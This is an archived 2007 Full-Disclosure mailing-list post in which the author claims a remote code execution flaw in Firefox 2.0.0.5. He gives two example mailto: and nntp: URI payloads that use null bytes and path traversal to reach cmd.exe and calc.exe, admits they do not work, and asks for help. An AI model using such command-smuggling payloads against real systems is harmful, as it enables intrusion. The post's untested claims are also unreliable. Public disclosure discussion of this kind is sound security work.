[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] FIREFOX 2.0.0.5 new vulnerability

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
From: "Mesut EREN" <meren@xxxxxxxxxxxxxxxxxxx>
Date: Wed, 25 Jul 2007 11:38:57 +0300

Hi all,

FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But
don't work is code.

Example code is 

mailto:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

Where i missing?



Mesut EREN
BAŞAK ÇATI & CEPHE SİSTEMLERİ
Bilgi İşlem Sorumlusu
MCSA:S,MCSE:S,CEH,CCNA
meren@xxxxxxxxxxxxxxxxxxx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
  - From: Valdis . Kletnieks
- Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
  - From: pdp (architect)
- Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
  - From: Nate McFeters
- Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
  - From: wac

Prev by Date: Re: [Full-disclosure] Am I missing anything ?
Next by Date: Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
Previous by thread: Re: [Full-disclosure] [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities
Next by thread: Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
Index(es):
- Date
- Thread